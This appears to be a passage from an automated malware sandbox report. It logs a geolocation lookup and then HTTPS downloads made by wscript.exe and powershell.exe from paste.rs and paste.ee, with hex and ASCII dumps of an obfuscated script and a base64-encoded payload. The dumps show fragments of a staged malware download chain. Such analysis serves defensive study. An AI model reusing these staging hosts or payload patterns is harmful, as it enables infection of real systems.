                                                        Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 [TRUNCATED]
                                                        Data Ascii: { "geoplugin_request":"8.46.123.189", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7503", "geoplugin_longitude":"-74.0014", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                        HTTPS Proxied Packets

                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        0192.168.2.64971345.63.94.2144433556C:\Windows\System32\wscript.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-17 13:30:05 UTC317OUTGET /LDDIb HTTP/1.1
                                                        Accept: */*
                                                        Accept-Language: en-ch
                                                        UA-CPU: AMD64
                                                        Accept-Encoding: gzip, deflate
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                        Host: paste.rs
                                                        Connection: Keep-Alive
                                                        2024-12-17 13:30:06 UTC439INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Tue, 17 Dec 2024 13:30:06 GMT
                                                        Content-Type: text/plain; charset=utf-8
                                                        Content-Length: 79269
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        x-content-type-options: nosniff
                                                        permissions-policy: interest-cohort=()
                                                        x-frame-options: SAMEORIGIN
                                                        Strict-Transport-Security: max-age=31536000; includeSubdomains;
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        X-XSS-Protection: 1; mode=block
                                                        2024-12-17 13:30:06 UTC15945INData Raw: 0d 0a 20 20 20 20 0d 0a 55 76 4c 67 53 47 65 4e 43 63 70 78 41 64 4a 20 3d 20 22 4c 78 42 66 4c 62 6d 47 5a 67 52 50 7a 62 4b 22 0d 0a 55 50 68 41 63 6d 4c 4c 69 62 6b 4b 47 5a 71 20 3d 20 22 57 64 43 49 4c 63 6b 72 4f 57 5a 57 51 5a 4e 22 0d 0a 57 4b 63 41 4a 4e 74 57 41 65 4f 47 6a 43 61 20 3d 20 22 68 6b 50 49 55 7a 62 72 57 5a 4b 6b 63 50 70 22 0d 0a 0d 0a 6f 65 78 42 4b 6f 47 70 63 4a 4e 68 50 57 66 20 3d 20 22 55 67 4b 63 4c 75 53 68 47 4f 4b 52 4c 64 57 22 0d 0a 65 4b 6b 65 47 69 74 4b 6d 50 63 47 47 4b 71 20 3d 20 22 6b 70 57 6d 4b 55 63 78 53 6b 4c 4c 57 57 50 22 0d 0a 5a 6d 41 63 4b 6f 47 69 53 69 55 4c 69 4b 7a 20 3d 20 22 5a 70 63 54 41 4c 4c 6d 4c 63 4c 73 4c 63 63 22 0d 0a 55 57 66 68 74 4c 4b 57 55 55 67 6f 50 71 7a 20 3d 20 22 62 54 70 6b
                                                        Data Ascii: UvLgSGeNCcpxAdJ = "LxBfLbmGZgRPzbK"UPhAcmLLibkKGZq = "WdCILckrOWZWQZN"WKcAJNtWAeOGjCa = "hkPIUzbrWZKkcPp"oexBKoGpcJNhPWf = "UgKcLuShGOKRLdW"eKkeGitKmPcGGKq = "kpWmKUcxSkLLWWP"ZmAcKoGiSiULiKz = "ZpcTALLmLcLsLcc"UWfhtLKWUUgoPqz = "bTpk
                                                        2024-12-17 13:30:06 UTC16384INData Raw: 20 22 6b 4e 69 4a 74 70 69 6d 6e 61 69 70 69 4b 55 22 0d 0a 4f 61 57 57 71 57 68 57 68 4c 4c 69 4c 57 6b 20 3d 20 22 4c 4e 5a 47 69 50 41 66 47 57 50 78 47 4b 72 22 0d 0a 42 64 75 70 57 55 55 4f 41 62 49 61 70 65 57 20 3d 20 22 57 57 4b 69 4c 74 4c 6c 50 4c 7a 4c 4c 6d 55 22 0d 0a 63 4c 66 57 61 65 4b 52 63 65 41 55 6b 67 75 20 3d 20 22 41 53 75 73 4c 57 4b 6f 7a 6f 69 53 6d 4f 61 22 0d 0a 52 52 66 62 72 6d 4c 4e 4c 4c 53 76 5a 4c 73 20 3d 20 22 62 57 76 68 6b 47 4b 7a 7a 52 4b 53 6d 64 69 22 0d 0a 0d 0a 69 6b 69 4e 68 68 5a 4c 4b 62 63 4b 57 41 4b 20 3d 20 22 62 76 4b 6f 6b 62 4c 4f 4c 48 57 57 4b 63 65 22 0d 0a 6b 4c 55 6b 52 4b 55 69 6f 69 4b 47 69 6b 57 20 3d 20 22 57 70 4b 6b 47 4c 63 6d 6f 55 70 68 69 63 4b 22 0d 0a 72 4c 6b 68 4c 74 61 66 51 43 72
                                                        Data Ascii: "kNiJtpimnaipiKU"OaWWqWhWhLLiLWk = "LNZGiPAfGWPxGKr"BdupWUUOAbIapeW = "WWKiLtLlPLzLLmU"cLfWaeKRceAUkgu = "ASusLWKozoiSmOa"RRfbrmLNLLSvZLs = "bWvhkGKzzRKSmdi"ikiNhhZLKbcKWAK = "bvKokbLOLHWWKce"kLUkRKUioiKGikW = "WpKkGLcmoUphicK"rLkhLtafQCr
                                                        2024-12-17 13:30:06 UTC16384INData Raw: 70 55 4a 62 72 70 6f 42 65 73 57 7a 52 20 3d 20 22 65 69 57 4c 6c 4b 4b 5a 4c 52 61 47 62 4f 4a 22 0d 0a 72 6f 6f 7a 75 74 52 47 68 6f 75 6d 66 4c 66 20 3d 20 22 6d 63 75 57 63 50 57 67 4b 4b 6d 69 52 7a 51 22 0d 0a 78 5a 43 6b 6d 52 4c 4c 70 55 4c 4b 69 42 4f 20 3d 20 22 61 6b 65 57 64 57 62 57 4b 71 7a 71 4c 4c 4b 22 0d 0a 50 70 43 52 50 4c 4c 4f 57 78 6b 69 55 4c 4c 20 3d 20 22 4c 6e 4e 51 4c 71 4c 63 4c 4b 47 6d 71 6b 63 22 0d 0a 0d 0a 6c 62 68 4c 66 69 71 6f 4c 64 57 4c 72 7a 41 20 3d 20 22 70 4b 69 6f 55 4c 62 6b 6e 4c 73 6d 69 62 4c 22 0d 0a 41 50 6b 6e 4c 4c 6d 4c 48 55 4c 52 52 4c 67 20 3d 20 22 57 54 43 4b 47 57 47 71 7a 4b 62 4c 50 55 51 22 0d 0a 47 53 69 7a 4a 65 4f 49 4c 4e 4c 78 47 4b 51 20 3d 20 22 6f 55 63 4f 65 4c 4b 55 6a 6c 47 7a 4f 47
                                                        Data Ascii: pUJbrpoBesWzR = "eiWLlKKZLRaGbOJ"roozutRGhoumfLf = "mcuWcPWgKKmiRzQ"xZCkmRLLpULKiBO = "akeWdWbWKqzqLLK"PpCRPLLOWxkiULL = "LnNQLqLcLKGmqkc"lbhLfiqoLdWLrzA = "pKioULbknLsmibL"APknLLmLHULRRLg = "WTCKGWGqzKbLPUQ"GSizJeOILNLxGKQ = "oUcOeLKUjlGzOG
                                                        2024-12-17 13:30:06 UTC16384INData Raw: 5a 55 69 70 7a 70 63 75 7a 6f 6e 69 6f 41 22 0d 0a 62 47 54 76 65 5a 68 57 62 61 5a 41 64 63 69 20 3d 20 22 55 6d 49 57 6e 43 73 57 42 57 6b 57 4b 4c 4c 22 0d 0a 70 52 4c 57 4c 6b 66 5a 64 50 75 4b 75 69 4c 20 3d 20 22 57 67 51 52 4b 5a 62 5a 65 4e 4b 57 4b 4a 57 22 0d 0a 0d 0a 76 41 71 4c 4f 63 78 62 66 78 50 6c 61 53 4a 20 3d 20 22 68 76 73 61 67 6e 6b 6e 57 69 48 4c 57 48 70 22 0d 0a 4b 75 62 66 7a 62 63 47 4c 50 6f 4c 42 55 73 20 3d 20 22 4c 69 66 62 55 65 69 54 62 47 41 69 57 74 63 22 0d 0a 6f 65 55 69 69 66 47 63 51 4c 57 4e 4b 74 47 20 3d 20 22 4c 4e 4c 6b 65 50 63 4b 4b 7a 69 6d 52 6b 6c 22 0d 0a 69 63 6f 68 47 51 55 51 41 48 63 47 76 42 5a 20 3d 20 22 61 4b 4b 4b 4c 57 65 6f 76 4f 41 53 65 62 4c 22 0d 0a 68 6e 71 72 55 71 78 71 61 42 63 51 61 57
                                                        Data Ascii: ZUipzpcuzonioA"bGTveZhWbaZAdci = "UmIWnCsWBWkWKLL"pRLWLkfZdPuKuiL = "WgQRKZbZeNKWKJW"vAqLOcxbfxPlaSJ = "hvsagnknWiHLWHp"KubfzbcGLPoLBUs = "LifbUeiTbGAiWtc"oeUiifGcQLWNKtG = "LNLkePcKKzimRkl"icohGQUQAHcGvBZ = "aKKKLWeovOASebL"hnqrUqxqaBcQaW
                                                        2024-12-17 13:30:06 UTC14172INData Raw: 0a 62 4c 61 47 6f 67 6c 57 78 6b 62 47 72 6b 72 20 3d 20 22 50 63 4c 6f 49 73 4f 6e 5a 66 4b 4c 4e 74 4f 22 0d 0a 69 47 41 6d 5a 53 54 57 4b 69 43 41 4c 57 42 20 3d 20 22 6d 63 62 6c 4c 67 71 75 4e 74 75 4b 6f 6f 64 22 0d 0a 0d 0a 73 6e 4b 4f 64 74 6d 71 4e 74 4b 43 50 6d 70 20 3d 20 22 4f 47 64 75 69 62 4c 69 47 73 66 4c 4c 63 65 22 0d 0a 61 78 6b 52 4b 64 65 55 4a 50 47 63 7a 63 65 20 3d 20 22 47 5a 4c 4b 47 66 57 73 4b 65 75 55 50 4b 53 22 0d 0a 6b 62 57 78 47 6f 4c 4b 42 57 55 4e 52 4c 4e 20 3d 20 22 62 66 42 47 7a 55 71 4b 69 74 7a 6a 50 74 42 22 0d 0a 4a 7a 42 55 78 4c 4c 5a 63 65 55 61 43 4c 6e 20 3d 20 22 71 63 68 5a 4c 65 47 6b 6f 42 47 41 5a 4c 42 22 0d 0a 69 57 4f 42 6f 4e 74 55 70 4c 4b 4b 4b 63 4c 20 3d 20 22 68 52 63 57 4c 55 4b 6f 48 57 57
                                                        Data Ascii: bLaGoglWxkbGrkr = "PcLoIsOnZfKLNtO"iGAmZSTWKiCALWB = "mcblLgquNtuKood"snKOdtmqNtKCPmp = "OGduibLiGsfLLce"axkRKdeUJPGczce = "GZLKGfWsKeuUPKS"kbWxGoLKBWUNRLN = "bfBGzUqKitzjPtB"JzBUxLLZceUaCLn = "qchZLeGkoBGAZLB"iWOBoNtUpLKKKcL = "hRcWLUKoHWW


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        1192.168.2.649784104.21.84.674433704C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-17 13:30:37 UTC67OUTGET /r/IUrXP/0 HTTP/1.1
                                                        Host: paste.ee
                                                        Connection: Keep-Alive
                                                        2024-12-17 13:30:37 UTC1292INHTTP/1.1 200 OK
                                                        Date: Tue, 17 Dec 2024 13:30:37 GMT
                                                        Content-Type: text/plain; charset=utf-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Cache-Control: max-age=2592000
                                                        strict-transport-security: max-age=63072000
                                                        x-frame-options: DENY
                                                        x-content-type-options: nosniff
                                                        x-xss-protection: 1; mode=block
                                                        content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
                                                        CF-Cache-Status: HIT
                                                        Age: 24562
                                                        Last-Modified: Tue, 17 Dec 2024 06:41:15 GMT
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zj1HkdSjYuKocE28L1%2BvjiFcMRk%2Fmw5LWfj4PRF9wJdd0LxiH8Cx8rJvdg7v%2B0kFhaT%2FaSAgDTKA7XGIQxor1Na7s69eYAFRSb6%2FnbG4%2B2BKFtJXMuNRwuVLcA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8f3744cfebc042c6-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        2024-12-17 13:30:37 UTC215INData Raw: 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 31 38 31 33 26 6d 69 6e 5f 72 74 74 3d 31 38 31 32 26 72 74 74 5f 76 61 72 3d 36 38 33 26 73 65 6e 74 3d 35 26 72 65 63 76 3d 37 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 32 38 31 36 26 72 65 63 76 5f 62 79 74 65 73 3d 36 38 31 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 31 35 39 38 32 34 38 26 63 77 6e 64 3d 31 34 39 26 75 6e 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 63 69 64 3d 62 34 61 63 35 63 64 64 63 34 31 35 61 38 36 35 26 74 73 3d 34 36 39 26 78 3d 30 22 0d 0a 0d 0a
                                                        Data Ascii: server-timing: cfL4;desc="?proto=TCP&rtt=1813&min_rtt=1812&rtt_var=683&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2816&recv_bytes=681&delivery_rate=1598248&cwnd=149&unsent_bytes=0&cid=b4ac5cddc415a865&ts=469&x=0"
                                                        2024-12-17 13:30:37 UTC1231INData Raw: 37 61 38 65 0d 0a 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 77 44 2b 38 67 4e 50 38 79 44 6e 38 77 48 50 59 78 44 54 38 77 43 50 41 73 44 35 37 51 38 4f 6b 75 44 67 37 41 32 4f 38 73 44 48 36 41 76 4f 4d 72 44 72 36 77 6f 4f 73 70 44 52 36 67 69 4f 51 6f 44 43 36 51 67 4f 41 6b 44 2f 35
                                                        Data Ascii: 7a8eAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwD+8gNP8yDn8wHPYxDT8wCPAsD57Q8OkuDg7A2O8sDH6AvOMrDr6woOspDR6giOQoDC6QgOAkD/5
                                                        2024-12-17 13:30:37 UTC1369INData Raw: 67 45 4f 41 68 44 50 34 67 44 4f 6f 67 44 4a 34 51 78 4e 38 66 44 39 33 41 2f 4e 73 66 44 36 33 67 39 4e 55 66 44 78 33 77 36 4e 6b 65 44 6f 33 77 35 4e 59 65 44 69 33 51 34 4e 30 64 44 58 33 51 31 4e 51 64 44 54 33 77 7a 4e 34 63 44 4b 33 41 78 4e 49 63 44 42 33 41 67 4e 38 62 44 37 32 67 75 4e 59 62 44 77 32 67 72 4e 30 61 44 73 32 41 71 4e 63 61 44 6a 32 51 6e 4e 73 5a 44 61 32 67 6c 4e 55 5a 44 52 32 77 69 4e 6b 59 44 49 32 41 68 4e 4d 55 44 39 31 41 66 4e 73 58 44 36 31 41 5a 4e 49 57 44 68 41 41 51 41 6b 42 67 42 41 44 41 41 41 73 44 61 37 51 47 4d 77 41 41 41 41 41 42 41 47 41 4c 41 37 41 7a 4f 6f 6f 44 31 36 41 74 4f 41 72 44 6d 36 67 6e 4f 55 70 44 50 36 67 6a 4f 6f 6f 44 45 35 41 65 4f 49 6e 44 72 35 67 61 4f 49 6d 44 68 35 41 59 4f 38 42 41 41
                                                        Data Ascii: gEOAhDP4gDOogDJ4QxN8fD93A/NsfD63g9NUfDx3w6NkeDo3w5NYeDi3Q4N0dDX3Q1NQdDT3wzN4cDK3AxNIcDB3AgN8bD72guNYbDw2grN0aDs2AqNcaDj2QnNsZDa2glNUZDR2wiNkYDI2AhNMUD91AfNsXD61AZNIWDhAAQAkBgBADAAAsDa7QGMwAAAAABAGALA7AzOooD16AtOArDm6gnOUpDP6gjOooDE5AeOInDr5gaOImDh5AYO8BAA
                                                        2024-12-17 13:30:37 UTC1369INData Raw: 75 4f 6b 72 44 33 36 51 74 4f 4d 72 44 78 36 77 72 4f 30 71 44 72 36 51 71 4f 63 71 44 6c 36 77 6f 4f 45 71 44 66 36 51 6e 4f 73 70 44 5a 36 77 6c 4f 55 70 44 54 36 51 6b 4f 38 6f 44 4e 36 77 69 4f 6b 6f 44 48 36 51 68 4f 4d 6f 44 42 35 77 66 4f 30 6e 44 37 35 51 65 4f 63 6e 44 31 35 77 63 4f 45 6e 44 76 35 51 62 4f 73 6d 44 70 35 77 5a 4f 55 6d 44 6a 35 51 59 4f 38 6c 44 64 35 77 57 4f 6b 6c 44 58 35 51 56 4f 4d 6c 44 52 35 77 54 4f 30 6b 44 4c 35 51 53 4f 63 6b 44 46 35 77 51 4f 45 67 44 2f 34 51 50 4f 73 6a 44 35 34 77 4e 4f 55 6a 44 7a 34 51 4d 4f 38 69 44 74 34 77 4b 4f 6b 69 44 6e 34 51 4a 4f 4d 69 44 68 34 77 48 4f 30 68 44 62 34 51 47 4f 63 68 44 56 34 77 45 4f 45 68 44 50 34 51 44 4f 73 67 44 4a 34 77 42 4f 55 67 44 44 34 51 77 4e 38 66 44 39 33
                                                        Data Ascii: uOkrD36QtOMrDx6wrO0qDr6QqOcqDl6woOEqDf6QnOspDZ6wlOUpDT6QkO8oDN6wiOkoDH6QhOMoDB5wfO0nD75QeOcnD15wcOEnDv5QbOsmDp5wZOUmDj5QYO8lDd5wWOklDX5QVOMlDR5wTO0kDL5QSOckDF5wQOEgD/4QPOsjD54wNOUjDz4QMO8iDt4wKOkiDn4QJOMiDh4wHO0hDb4QGOchDV4wEOEhDP4QDOsgDJ4wBOUgDD4QwN8fD93
                                                        2024-12-17 13:30:37 UTC1369INData Raw: 4e 49 59 44 41 31 67 66 4e 77 58 44 36 31 41 65 4e 59 58 44 30 31 67 63 4e 41 58 44 75 31 41 62 4e 6f 57 44 6f 31 67 5a 4e 51 57 44 69 31 41 59 4e 34 56 44 63 31 67 57 4e 67 56 44 57 31 41 56 4e 49 56 44 51 31 67 54 4e 77 55 44 4b 31 41 53 4e 59 55 44 45 31 67 51 4e 41 51 44 2b 30 41 50 4e 6f 54 44 34 30 67 4e 4e 51 54 44 79 30 41 4d 4e 34 53 44 73 30 67 4b 4e 67 53 44 6d 30 41 4a 4e 49 53 44 67 30 67 48 4e 77 52 44 61 30 41 47 4e 59 52 44 55 30 67 45 4e 41 52 44 4f 30 41 44 4e 6f 51 44 49 30 67 42 4e 51 51 44 43 30 41 77 4d 34 50 44 38 7a 67 2b 4d 67 50 44 32 7a 41 39 4d 49 50 44 77 7a 67 37 4d 77 4f 44 71 7a 41 36 4d 59 4f 44 6b 7a 67 34 4d 41 4f 44 65 7a 41 33 4d 6f 4e 44 59 7a 67 31 4d 51 4e 44 53 7a 41 30 4d 34 4d 44 4d 7a 67 79 4d 67 4d 44 47 7a 41
                                                        Data Ascii: NIYDA1gfNwXD61AeNYXD01gcNAXDu1AbNoWDo1gZNQWDi1AYN4VDc1gWNgVDW1AVNIVDQ1gTNwUDK1ASNYUDE1gQNAQD+0APNoTD40gNNQTDy0AMN4SDs0gKNgSDm0AJNISDg0gHNwRDa0AGNYRDU0gENARDO0ADNoQDI0gBNQQDC0AwM4PD8zg+MgPD2zA9MIPDwzg7MwODqzA6MYODkzg4MAODezA3MoNDYzg1MQNDSzA0M4MDMzgyMgMDGzA
                                                        2024-12-17 13:30:37 UTC1369INData Raw: 4d 71 44 68 36 77 6e 4f 30 70 44 62 36 51 6d 4f 63 70 44 56 36 77 6b 4f 45 70 44 50 36 51 6a 4f 73 6f 44 4a 36 77 68 4f 55 6f 44 44 36 51 51 4f 38 6e 44 39 35 77 65 4f 6b 6e 44 33 35 51 64 4f 4d 6e 44 78 35 77 62 4f 30 6d 44 72 35 51 61 4f 63 6d 44 6c 35 77 59 4f 45 6d 44 66 35 51 58 4f 73 6c 44 5a 35 77 56 4f 55 6c 44 54 35 51 55 4f 38 6b 44 4e 35 77 53 4f 6b 6b 44 48 35 51 52 4f 4d 6b 44 42 34 77 50 4f 30 6a 44 37 34 51 4f 4f 63 6a 44 31 34 77 4d 4f 45 6a 44 76 34 51 4c 4f 45 68 44 51 34 77 44 4f 34 67 44 4e 34 41 44 4f 73 67 44 4b 34 51 43 4f 67 67 44 48 34 67 42 4f 55 67 44 45 34 41 77 4e 38 66 44 2b 33 51 2f 4e 77 66 44 37 33 67 2b 4e 6b 66 44 34 33 77 39 4e 59 66 44 31 33 41 38 4e 38 65 44 75 33 51 37 4e 77 65 44 72 33 67 36 4e 6b 65 44 6f 33 77 35
                                                        Data Ascii: MqDh6wnO0pDb6QmOcpDV6wkOEpDP6QjOsoDJ6whOUoDD6QQO8nD95weOknD35QdOMnDx5wbO0mDr5QaOcmDl5wYOEmDf5QXOslDZ5wVOUlDT5QUO8kDN5wSOkkDH5QROMkDB4wPO0jD74QOOcjD14wMOEjDv4QLOEhDQ4wDO4gDN4ADOsgDK4QCOggDH4gBOUgDE4AwN8fD+3Q/NwfD73g+NkfD43w9NYfD13A8N8eDu3Q7NweDr3g6NkeDo3w5
                                                        2024-12-17 13:30:37 UTC1369INData Raw: 41 6a 78 41 41 41 41 49 42 51 42 51 41 41 41 41 38 54 30 2f 45 68 50 41 37 6a 64 2b 73 69 50 69 30 6a 74 39 30 61 50 77 30 7a 4a 38 51 4b 50 61 74 7a 59 36 4d 76 4f 2b 6d 6a 7a 35 73 62 4f 7a 67 54 2f 34 6b 53 4e 2f 51 54 35 30 51 33 4d 4e 4f 44 62 79 51 76 4d 54 4c 54 76 79 51 6f 4d 65 45 7a 37 78 55 63 4d 63 42 44 68 77 63 44 41 41 41 41 55 41 55 41 41 41 38 54 76 2f 73 36 50 69 34 44 33 39 4d 74 4f 57 6f 6a 44 36 59 51 4f 2b 6e 7a 39 34 49 7a 4e 32 66 44 35 33 49 39 4e 41 66 6a 72 32 6b 50 4e 51 4d 54 30 7a 38 37 4d 74 4f 7a 6d 7a 6b 34 4d 33 4e 54 5a 7a 4d 31 4d 42 4e 7a 4c 7a 30 78 4d 4c 49 54 2b 79 55 72 4d 68 4b 54 55 79 6f 6b 4d 50 45 54 2b 78 63 63 4d 37 47 44 6a 78 38 58 4d 42 46 44 49 78 59 52 4d 44 41 54 32 77 41 4e 4d 4a 44 7a 68 77 41 49 4d
                                                        Data Ascii: AjxAAAAIBQBQAAAA8T0/EhPA7jd+siPi0jt90aPw0zJ8QKPatzY6MvO+mjz5sbOzgT/4kSN/QT50Q3MNODbyQvMTLTvyQoMeEz7xUcMcBDhwcDAAAAUAUAAA8Tv/s6Pi4D39MtOWojD6YQO+nz94IzN2fD53I9NAfjr2kPNQMT0z87MtOzmzk4M3NTZzM1MBNzLz0xMLIT+yUrMhKTUyokMPET+xccM7GDjx8XMBFDIxYRMDAT2wANMJDzhwAIM
                                                        2024-12-17 13:30:37 UTC1369INData Raw: 6a 5a 33 6b 30 4e 44 5a 54 47 30 30 78 4d 4e 4e 6a 4c 7a 77 67 4d 65 4b 44 66 79 77 6d 4d 58 4a 54 54 78 77 61 4d 58 47 6a 6a 78 45 59 4d 32 46 44 49 78 67 42 4d 7a 44 7a 36 77 30 4c 4d 32 43 54 70 77 73 4a 4d 52 43 6a 69 77 73 48 4d 31 42 6a 62 77 4d 47 41 41 41 41 64 41 51 41 67 41 41 41 41 2b 63 75 50 63 37 44 66 2b 51 69 50 65 34 44 47 2b 55 51 50 33 33 7a 37 39 67 64 50 4f 33 7a 77 39 30 62 50 34 32 7a 6b 39 6f 59 50 6d 31 6a 58 39 38 52 50 58 77 6a 31 38 73 4d 50 34 78 6a 63 38 73 41 50 44 73 54 39 37 30 2b 4f 6b 76 7a 32 37 4d 39 4f 4c 76 7a 77 37 67 37 4f 6d 75 6a 6e 37 49 35 4f 4b 75 54 67 37 67 33 4f 77 74 44 61 37 41 32 4f 59 74 7a 53 37 38 7a 4f 33 6f 54 2b 36 30 73 4f 68 71 6a 65 36 51 6e 4f 75 70 44 61 36 41 6d 4f 63 70 54 55 36 49 6b 4f 32
                                                        Data Ascii: jZ3k0NDZTG00xMNNjLzwgMeKDfywmMXJTTxwaMXGjjxEYM2FDIxgBMzDz6w0LM2CTpwsJMRCjiwsHM1BjbwMGAAAAdAQAgAAAA+cuPc7Df+QiPe4DG+UQP33z79gdPO3zw90bP42zk9oYPm1jX98RPXwj18sMP4xjc8sAPDsT970+Okvz27M9OLvzw7g7Omujn7I5OKuTg7g3OwtDa7A2OYtzS78zO3oT+60sOhqje6QnOupDa6AmOcpTU6IkO2
                                                        2024-12-17 13:30:37 UTC1369INData Raw: 6b 30 30 48 4e 75 52 6a 50 30 49 43 4e 50 4d 44 36 7a 49 74 4d 65 4b 54 62 79 49 6d 4d 48 4a 7a 49 79 63 51 4d 31 44 7a 7a 77 45 4c 4d 54 43 6a 54 41 41 41 41 30 43 41 42 67 41 41 41 41 38 44 5a 2f 63 31 50 48 39 6a 4f 2b 49 6f 50 43 35 44 4d 2b 4d 69 50 59 30 44 39 39 51 63 50 33 32 54 6e 39 49 44 50 79 76 7a 54 37 6f 54 4f 39 67 44 33 34 49 46 4f 49 63 7a 38 33 6b 35 4e 47 5a 54 4f 31 73 56 4e 34 55 44 43 7a 63 50 41 41 41 41 52 41 51 41 45 41 41 41 41 34 4d 65 4e 56 57 44 65 31 59 43 4e 41 50 44 71 79 73 75 4d 79 4b 44 6a 79 41 56 4d 7a 42 54 67 77 41 46 41 41 41 41 4a 41 51 41 41 41 38 6a 73 2f 30 32 50 36 34 44 36 2b 73 72 50 4f 32 44 33 39 63 43 50 33 76 6a 70 37 38 31 4f 45 6f 6a 39 34 34 37 4e 79 62 54 58 7a 6b 38 4d 35 4d 7a 45 79 59 76 4d 45 45
                                                        Data Ascii: k00HNuRjP0ICNPMD6zItMeKTbyImMHJzIycQM1DzzwELMTCjTAAAA0CABgAAAA8DZ/c1PH9jO+IoPC5DM+MiPY0D99QcP32Tn9IDPyvzT7oTO9gD34IFOIcz83k5NGZTO1sVN4UDCzcPAAAARAQAEAAAA4MeNVWDe1YCNAPDqysuMyKDjyAVMzBTgwAFAAAAJAQAAA8js/02P64D6+srPO2D39cCP3vjp781OEoj9447NybTXzk8M5MzEyYvMEE
